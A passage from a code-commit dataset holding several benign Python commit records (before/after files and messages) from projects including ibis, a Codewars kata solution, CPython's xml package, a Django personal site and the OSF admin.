args.extend(['-m', 'not e2e'])
pytest.main(args)
<commit_msg>Add desc to ibis namespace<commit_after># Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
|
e43c03fbb04de6ef067a22b62ce5c8049020831a | cw_find_the_unique_number.py | cw_find_the_unique_number.py | """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
| """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
| Complete dict sol w/ time/space complexity | Complete dict sol w/ time/space complexity
| Python | bsd-2-clause | bowen0701/algorithms_data_structures | """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
Complete dict sol w/ time/space complexity | """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
| <commit_before>"""Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
<commit_msg>Complete dict sol w/ time/space complexity<commit_after> | """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
| """Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
Complete dict sol w/ time/space complexity"""Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
| <commit_before>"""Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It’s guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
# your code here
return n # n: unique integer in the array
def main():
pass
if __name__ == '__main__':
main()
<commit_msg>Complete dict sol w/ time/space complexity<commit_after>"""Codewars: Find the unique number
6 kyu
URL: https://www.codewars.com/kata/find-the-unique-number-1/
There is an array with some numbers. All numbers are equal except for one.
Try to find it!
find_uniq([ 1, 1, 1, 2, 1, 1 ]) == 2
find_uniq([ 0, 0, 0.55, 0, 0 ]) == 0.55
It's guaranteed that array contains more than 3 numbers.
The tests contain some very huge arrays, so think about performance.
This is the first kata in series:
- Find the unique number (this kata)
- Find the unique string
- Find The Unique
"""
def find_uniq(arr):
"""
Use dict to collect number counts.
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import defaultdict
num_counts = defaultdict(int)
for num in arr:
num_counts[num] += 1
for num, count in num_counts.items():
if count == 1:
n = num
return n
def main():
# Output: 2
arr = [ 1, 1, 1, 2, 1, 1 ]
print find_uniq(arr)
# Output: 0.55
arr = [ 0, 0, 0.55, 0, 0 ]
print find_uniq(arr)
if __name__ == '__main__':
main()
|
9ca11ae97ac21d6525da853c9ec3e8007939d187 | Lib/xml/__init__.py | Lib/xml/__init__.py | """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| Use Guido's trick for always extracting the version number from a CVS Revision string correctly, even under -kv. | Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv.
| Python | mit | sk-/python2.7-type-annotator,sk-/python2.7-type-annotator,sk-/python2.7-type-annotator | """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv. | """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| <commit_before>"""Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
<commit_msg>Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv.<commit_after> | """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| """Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv."""Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
| <commit_before>"""Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
__version__ = "$Revision$".split()[1]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
<commit_msg>Use Guido's trick for always extracting the version number from a
CVS Revision string correctly, even under -kv.<commit_after>"""Core XML support for Python.
This package contains three sub-packages:
dom -- The W3C Document Object Model. This supports DOM Level 1 +
Namespaces.
parsers -- Python wrappers for XML parsers (currently only supports Expat).
sax -- The Simple API for XML, developed by XML-Dev, led by David
Megginson and ported to Python by Lars Marius Garshol. This
supports the SAX 2 API.
"""
__all__ = ["dom", "parsers", "sax"]
# When being checked-out without options, this has the form
# "<dollar>Revision: x.y </dollar>"
# When exported using -kv, it is "x.y".
__version__ = "$Revision$".split()[-2][0]
_MINIMUM_XMLPLUS_VERSION = (0, 6, 1)
try:
import _xmlplus
except ImportError:
pass
else:
try:
v = _xmlplus.version_info
except AttributeError:
# _xmlplue is too old; ignore it
pass
else:
if v >= _MINIMUM_XMLPLUS_VERSION:
import sys
sys.modules[__name__] = _xmlplus
else:
del v
|
2b1cc5b2426994953e8f8b937364d91f4e7aadf2 | MyHub/MyHub/urls.py | MyHub/MyHub/urls.py | from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| Change default URL to display home content. Temporary fix. | Change default URL to display home content. Temporary fix.
| Python | mit | sebastienbarbier/sebastienbarbier.com,sebastienbarbier/sebastienbarbier.com,sebastienbarbier/sebastienbarbier.com,sebastienbarbier/sebastienbarbier.com | from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
Change default URL to display home content. Temporary fix. | from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| <commit_before>from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
<commit_msg>Change default URL to display home content. Temporary fix.<commit_after> | from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
Change default URL to display home content. Temporary fix.from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| <commit_before>from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
<commit_msg>Change default URL to display home content. Temporary fix.<commit_after>from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
86a26fb8a2f9754a27763cb04292735bc31d0fe7 | admin/subjects/views.py | admin/subjects/views.py | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| Change permission to correct codename of change_subject | Change permission to correct codename of change_subject
| Python | apache-2.0 | felliott/osf.io,sloria/osf.io,Johnetordoff/osf.io,Johnetordoff/osf.io,Johnetordoff/osf.io,baylee-d/osf.io,TomBaxter/osf.io,felliott/osf.io,icereval/osf.io,crcresearch/osf.io,icereval/osf.io,caneruguz/osf.io,aaxelb/osf.io,chennan47/osf.io,aaxelb/osf.io,brianjgeiger/osf.io,pattisdr/osf.io,HalcyonChimera/osf.io,adlius/osf.io,chrisseto/osf.io,chrisseto/osf.io,icereval/osf.io,pattisdr/osf.io,crcresearch/osf.io,aaxelb/osf.io,adlius/osf.io,caseyrollins/osf.io,mfraezz/osf.io,laurenrevere/osf.io,binoculars/osf.io,HalcyonChimera/osf.io,erinspace/osf.io,caseyrollins/osf.io,chrisseto/osf.io,TomBaxter/osf.io,CenterForOpenScience/osf.io,sloria/osf.io,CenterForOpenScience/osf.io,caneruguz/osf.io,CenterForOpenScience/osf.io,pattisdr/osf.io,erinspace/osf.io,caneruguz/osf.io,cslzchen/osf.io,erinspace/osf.io,felliott/osf.io,cslzchen/osf.io,mfraezz/osf.io,adlius/osf.io,cslzchen/osf.io,Johnetordoff/osf.io,laurenrevere/osf.io,adlius/osf.io,chennan47/osf.io,HalcyonChimera/osf.io,chrisseto/osf.io,saradbowman/osf.io,saradbowman/osf.io,brianjgeiger/osf.io,leb2dg/osf.io,mattclark/osf.io,HalcyonChimera/osf.io,baylee-d/osf.io,mattclark/osf.io,mfraezz/osf.io,cslzchen/osf.io,laurenrevere/osf.io,crcresearch/osf.io,caneruguz/osf.io,baylee-d/osf.io,felliott/osf.io,mattclark/osf.io,binoculars/osf.io,aaxelb/osf.io,binoculars/osf.io,brianjgeiger/osf.io,caseyrollins/osf.io,leb2dg/osf.io,leb2dg/osf.io,brianjgeiger/osf.io,leb2dg/osf.io,chennan47/osf.io,mfraezz/osf.io,CenterForOpenScience/osf.io,TomBaxter/osf.io,sloria/osf.io | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
Change permission to correct codename of change_subject | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
